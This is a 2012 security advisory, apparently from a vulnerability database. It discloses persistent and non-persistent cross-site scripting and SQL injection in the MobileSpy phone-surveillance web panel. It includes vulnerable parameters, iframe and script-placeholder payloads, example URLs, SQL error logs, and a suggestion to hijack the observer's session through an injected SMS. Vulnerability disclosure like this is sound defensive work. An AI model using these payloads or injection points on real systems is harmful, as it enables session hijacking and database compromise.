MobileSpy Android|iPhone|W7P|sOS - Web Vulnerabilities

2012-05-15T00:00:00
ID VULNERLAB:140
Type vulnerlab
Reporter Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
Modified 2012-05-15T00:00:00

Description

                                        
                                            Document Title:
===============
MobileSpy Android|iPhone|W7P|sOS - Web Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=140


Release Date:
=============
2012-05-15


Vulnerability Laboratory ID (VL-ID):
====================================
140


Common Vulnerability Scoring System:
====================================
7.1


Product & Service Introduction:
===============================
Mobile Spy defines the latest in high-tech cell phone surveillance. This revolutionary software allows individuals to easily install 
monitoring software directly onto a compatible smartphone that you own or have the proper consent to monitor. Once the software is 
installed onto the phone to be monitored, it silently logs activity such as SMS messages and call information along with recording 
GPS locations every 30 minutes when a GPS signal is available. There  no need to worry about being near the phone to view the activity 
after installation because activities are uploaded to a private account viewable using ANY web browser, even a Mac or phone web browser. 
Here s a diagram to help you visualize how this process works. This hybrid software gives you the ability to monitor your BlackBerry, iPhone, 
iPad, Android, Windows Mobile or Symbian OS based smartphone. Mobile Spy is the next generation of smartphone spy software. Do you suspect that 
your child or employee is abusing their SMS or vehicle privileges? If yes, then this software is ideal for you. Install this small program 
directly onto your compatible smartphone you want to monitor to begin recording.

Software is also available for Symbian OS, iOS (IPhone), Android(Google), Windows 7 Phone & Blackberry mobiles.

(Copy of the Vendor Homepage: http://www.mobile-spy.com  -- http://www.mobile-spy.com/smartdemo.html)


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in the MobileSpy & bound phone applications.


Vulnerability Disclosure Timeline:
==================================
2012-05-16:	Public or Non-Public Disclosure


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
1.1
Multiple server-side input validation vulnerabilities(persistent) are detected in the MobileSpy Surveillance web application. 
A remote attacker can manipulate specific application (paramater) requests or can hijack customer/spy sessions with low user inter action.

Vulnerable Modules: 
			[+] SMS Messages Sent and Received - Listing
			     [-] SMS Logs - View SMS - Text Message Display and Sender

			
Pictures:
			../1.png

Note: If you know for example your mobile is observed you can inject script code to your sms and send it via service. 
The SMS spy service is logging the issue & the script code is getting executed on the display website of the observer.
This possibility allows the observed person to spy back the attacking observer by redirection to log him when processing to watch the sms.


1.2
Multiple client side input validation vulnerabilities (non-persistent) are detected in the MobileSpy Surveillance web application.
The bugs allows remote attackers to implement/inject malicious script code on the application-side (persistent). 
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context 
manipulation. Exploitation requires medium or high user inter action.

Vulnerable Module(s): 
			[+] Login
			[+] Search Module

Pictures:
			../2.png


1.3
A remote SQL Injection vulnerability is detected in the MobileSpy Surveillance web application.
The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands 
on the affected application dbms. The vulnerability is located in the pgno= & order by application value request. 
Successful exploitation of the vulnerability results in dbms & application compromise. 

Vulnerable Module(s):
				[+] Parameter (pgno=|0&order=)


--- SQL Error Logs ---
SELECT * FROM callinfotbl WHERE RecType=0 AND UserID=3 ORDER BY CallDate DESC, CallTime DESC LIMIT -10, 10
... or
Showing -49 - 0 of 0 recordsSELECT *, DATE_FORMAT(SmsTime,  %H:%i:%s %p ) as  sTime  FROM sms WHERE UserID=1 
ORDER BY SmsDate DESC, SmsTime DESC LIMIT -50, 50 has error!
			
			
Picture(s):
			../3.png
			../4.png
			../5.png


Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by remote attackers. 
For demonstration or reproduce  ...

1.1
Code Review: Login (login.php) - (Persistent)

  <font color=red size=2><p>Invalid Username</p></font>   <table border="0" cellpadding="0" cellspacing="0" width="322" 
	background="images/login2.gif" height="193">
    <tr height="59">

     <td width="156" height="59"></td>
     <th height="59"></th>
    </tr>
    <tr height="33">
     <td width="156" height="33"></td>
     <td height="33"><input type="text" name="Username" size="18" value=">\"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!>" tabindex="1" ></td>
    </tr>
    <tr height="20">

     <td width="156" height="20"></td>
     <td height="20"><input type="password" name="Password" size="18" tabindex="2"></td>
    </tr>
    <tr>
     <td width="156"><img src="images/trans.gif" width="156" height="10" border="0"></td>
     <td align="right" valign="top">
      <div align="right">



1.2
Code Review: Messages Sent and Received (index.php) - (Non-Persistent)

<td align=right><p></p>
<p align=right><a href=csv.php target=_blank><img src=icons/disk.gif border="0"> Download CSV</a>  | Show All | 
<a href="?page=smsout&pgno=0&show=1&order=>"<iframe src=http://google.com>">
Outgoing</a> | <a href="?page=smsin&pgno=0&show=2"
&order=>"<[INSERT OWN NON-PERSISTENT SCRIPTCODE HERE!!!]>Incoming</a></p>
</td></table>


<td align=right><p></p>
<p align=right><a href=csv.php target=_blank><img src=icons/disk.gif border="0"> Download CSV</a>  
| Show All | <a href="?page=smsout&pgno=0&show=1&order=>"<[INSERT OWN NON-PERSISTENT SCRIPTCODE HERE!!!]>Outgoing</a>
| <a href="?page=smsin&pgno=0&show=2"
&order=>"<[INSERT OWN NON-PERSISTENT SCRIPTCODE HERE!!!]>Incoming</a></p>
</td></table>

References:
https://www.mobilespylogs.com/member/index.php?page=smsinout&pgno=0&show=0&order=[INSERT OWN NON-PERSISTENT SCRIPTCODE HERE!!!]
https://www.mobilespylogs.com/member/index.php?page=smsinout&pgno=0&show=[INSERT OWN NON-PERSISTENT SCRIPTCODE HERE!!!]


Code Review: Search Module (index.php) - (Non-Persistent)

<p class=".h1"><small><small><img src="images/11searchlogs2.jpg" border="0" width="234" height="29"></small></small><br>
	<b>Search Logs for a Specific Phone Number</b><br></p>
<hr color="lightgrey">
<p>Search Result for ">"<iframe src=http://global-evolution.info>"</p>
        <table width=100% size=0 background="ctitle_01.gif" cellpadding="2" cellspacing="1">





1.3

Path:		/member/
File:		index.php
Para:		?page=smsinout&pgno=[SQL-Injection] ... &show=0&order=0

Reference:
		https://127.0.0.1:8080/member/index.php?page=smsinout&pgno=[SQL-Injection]&show=0&order=0


Security Risk:
==============
1.1
The security risk of the persistent application vulnerabilities are estimated as high.

1.2
The security risk of the non persistent cross site vulnerabilities are estimated as medium(-).

1.3
The security risk of the remote sql injection vulnerability is estimated as high(+).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri  (bkm@vulnerability-lab.com)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

    				   	Copyright © 2012 | Vulnerability Laboratory